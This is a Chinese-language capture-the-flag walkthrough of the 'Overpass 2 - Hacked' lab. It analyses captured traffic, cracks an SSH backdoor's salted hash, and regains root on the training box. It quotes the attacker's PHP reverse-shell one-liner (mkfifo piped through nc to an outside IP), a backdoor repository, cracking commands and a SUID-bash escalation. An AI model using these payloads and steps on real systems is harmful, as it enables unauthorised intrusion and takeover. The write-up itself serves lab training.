Overpass 2 - Hacked

Overpass 被黑了！SOC团队（Paradox，恭喜升级）在深夜值班时查看 shibes 时发现了可疑活动，并成功捕获了攻击发生时的数据包。

您能弄清楚攻击者是如何入侵的，并重新入侵 Overpass 的生产服务器吗？

他们用来上传反向 shell 的页面 URL 是什么？

流量包中可以看到是development

‍

payload

1	<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 192.168.170.145 4242 >/tmp/f")?>

密码在tcp流3中

发现使用了ssh-backdoor

1	git clone https://github.com/NinjaJc01/ssh-backdoor

研究——分析代码

把后门代码拉下来

得到默认hash

1	6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

分析源代码，得到加盐值

得到

1	1c362db832f3f864c8c2fe05f2002a05

‍

爆破hash

hashcat

使用hashcat爆破，格式：<hash>:<salt>，保存到passwd.txt文件中。

1	6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

1	hashcat -m 1710 -a 0 passwd.txt /usr/share/wordlists/rockyou.txt -O

‍

john

已知为SHA512(pass+salt)，构造passwd1.txt

1
2
3

$dynamic_82$<hash>$<salt>

$dynamic_82$6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed$1c362db832f3f864c8c2fe05f2002a05

november16

‍

Attack - Get back in!

做代理后，访问靶机

发现标题

nmap扫描

root@jp4-20250507143913fda8f6:~# nmap -sV -sC -p- --min-rate 10000 10.10.147.5
Starting Nmap 7.80 ( https://nmap.org ) at 2025-05-08 01:06 EDT
Warning: 10.10.147.5 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.147.5
Host is up (0.21s latency).
Not shown: 52513 closed ports, 13019 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.01 seconds

根据目前为止收集的信息，我尝试以用户 james 的身份登录。使用爆破出来的密码

1	ssh -p 2222 james@10.10.147.5

getshell

发现.suid_bash文件为root所有

运行发现是个bash，bash | GTFOBins，发现

1	./.suid_bash -p

可以获取root权限

‍